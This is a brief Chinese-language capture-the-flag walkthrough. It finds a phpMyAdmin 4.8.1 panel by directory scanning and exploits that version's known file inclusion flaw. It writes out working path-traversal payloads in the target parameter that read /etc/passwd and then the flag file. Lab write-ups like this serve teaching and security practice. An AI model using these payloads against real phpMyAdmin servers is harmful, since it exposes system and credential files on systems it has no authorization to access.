打开链接
一堆乱码,查看源代码也没什么信息可提取,利用目录扫描器,看能不能扫出什么东西
扫到了一个phpmyadmin
进去看看
这里的版本号为4.8.1,而phpmyadmin在4.8.0以及4.8.1的版本号中有文件包含漏洞
我们试试读取看是否成功
index.php?target=sql.php?/../../../../../../../../../etc/passwd
成功
尝试读取flag
index.php?target=sql.php?/../../../../../../../../../flag
得到flag